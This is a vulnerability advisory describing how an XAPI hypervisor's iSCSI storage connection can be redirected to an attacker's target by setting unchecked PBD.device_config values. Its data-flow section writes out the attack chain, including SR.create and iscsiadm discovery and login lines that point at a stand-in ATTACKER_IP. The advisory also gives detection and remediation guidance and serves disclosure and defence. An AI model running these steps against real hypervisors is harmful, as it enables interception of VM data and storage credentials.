MOKSHA-2026-0004: iSCSI Target Redirection via PBD.device_config

Summary

A pool-operator can create an iSCSI SR with attacker-controlled target and targetIQN values in PBD.device_config. The SM driver reads these values unchecked and passes them directly to iscsiadm for iSCSI discovery and login. The hypervisor connects to the attacker's iSCSI target instead of the legitimate storage array. This enables complete storage man-in-the-middle: the attacker serves malicious disk images to VMs, captures all VM I/O, and intercepts CHAP credentials in transit. Via BOC-1 (MOKSHA-2026-0001), a vm-admin can escalate to pool-operator and exploit this finding.

Vulnerability Description

PBD.device_config is the primary storage connection string for all SM drivers in XAPI-based hypervisors. For iSCSI SRs, it carries target (iSCSI server IP or hostname), targetIQN (target qualified name), port, and authentication credentials. These values flow directly from the XAPI database to iscsiadm subprocess calls without validation.

Data Flow

SR.create(device_config={target: ATTACKER_IP, targetIQN: ATTACKER_IQN})
  -> PBD stored with unchecked values
  -> PBD.plug() triggers BaseISCSI.load()
  -> iscsilib.discovery() / login() with attacker values
  -> iscsiadm -m discovery -t sendtargets -p ATTACKER_IP
  -> iscsiadm -m node --login -T ATTACKER_IQN -p ATTACKER_IP
  -> Hypervisor connects to attacker-controlled iSCSI target

The SM driver (BaseISCSI.py) reads device_config via SRCommand.parse() and uses the target and targetIQN values directly in iscsilib.discovery() and iscsilib.login(). No IP address validation, no IQN format verification, no allowlist check occurs at any point in the chain.

Relationship to SMC-1

PDC-1 is the "front door" to the same storage infrastructure that SMC-1 (MOKSHA-2026-0002) attacks via the "side door." Both exploit the SM driver's blind trust of XAPI-supplied configuration. PDC targets connection parameters (where to connect); SMC-1 targets operational state (how to behave). Both are independently exploitable.

Root Causes

1. Zero validation on device_config values. XAPI stores device_config values in the PBD record without any format, range, or allowlist validation. IP addresses, IQNs, and port numbers are accepted as arbitrary strings.

2. SM driver blind trust. BaseISCSI.load() reads device_config and passes values directly to iscsiadm subprocess calls. The driver assumes all values originate from a trusted administrator.

3. No connection parameter immutability. Once stored, device_config values are not verified against the original SR creation parameters. No integrity check prevents post-creation modification.

Affected Systems

Directly Affected

• XenServer / Citrix Hypervisor - all versions (shared XAPI + SM driver codebase)
• XCP-ng 8.3 - confirmed (live-tested, all 6 PDC findings)

Storage Backends Affected

• All iSCSI storage arrays - receive connections from attacker-redirected hosts
• BaseISCSI SM driver - lvmoiscsi, rawhba SR types

Indirectly Affected

• Enterprise storage arrays (NetApp, Dell EMC, Pure, HPE) - attacker can impersonate a legitimate pool connecting to the array
• iSCSI SANs - attacker-controlled target captures CHAP credentials and VM I/O in transit

Exploitation Scenarios

Detection

• Monitor SR.create calls for device_config:target values pointing to unexpected IP addresses
• Maintain an allowlist of authorized iSCSI target IPs and alert on connections to unlisted targets
• Monitor iscsiadm process arguments for unexpected target addresses
• Audit PBD records for device_config:target values that do not match known storage infrastructure

Remediation

Short-Term Mitigations

• Restrict pool-operator role grants to trusted storage administrators
• Audit all PBD records for unexpected device_config:target values
• Implement network-level controls (firewall rules, VLAN isolation) to limit iSCSI connectivity to known storage targets

Long-Term Fix

Connection parameter validation: Each SR driver should define allowed device_config keys and value formats. For iSCSI: target must be a valid IP address or resolvable hostname on the storage network; targetIQN must conform to RFC 3720 IQN format; port must be an integer in range 1-65535.

Immutable device_config: Enforce true immutability at the XenAPI layer. Once set during SR.create, device_config should not be modifiable.

Upstream patches exist. They are held privately pending coordinated disclosure.

Disclosure

Disclosure:

• Public release: 2026-04-24 08:00 CEST
• CERT/CC notified: 2026-04-23
• MITRE CVE reservation filed: 2026-04-09 (no response as of publication)
• EU CVE registers notified: 2026-04-18 (GCVE/CIRCL, ENISA, DIVD - no response)
• Vendor (Cloud Software Group / Citrix): not contacted pre-publication
• Downstream maintainer (Vates/XCP-ng): contacted 2026-04-23 with conditional patch offer

References

• Related MOKSHA IDs: MOKSHA-2026-0005 (PDC-2 NFS redirection), MOKSHA-2026-0010 (PDC-5 block device injection), MOKSHA-2026-0002 (SMC-1 sm_config injection)
• XAPI source: BaseISCSI.py (driver), iscsilib.py (discovery/login), SRCommand.py:parse() (config parsing)
• Thematic advisory: disclosure/advisories/pdc-security-advisory.md
• Investigation: research/investigations/pbd-device-config.md
• PoC scripts: research/pdc-1/poc/pdc-1-iscsi-target-redirect.py (available to CSIRTs on request)
• Evidence: pdc-1-iscsi-target-redirect-20260321-212926.log

Credits

Discovered and reported by Jakob Wolffhechel, Moksha.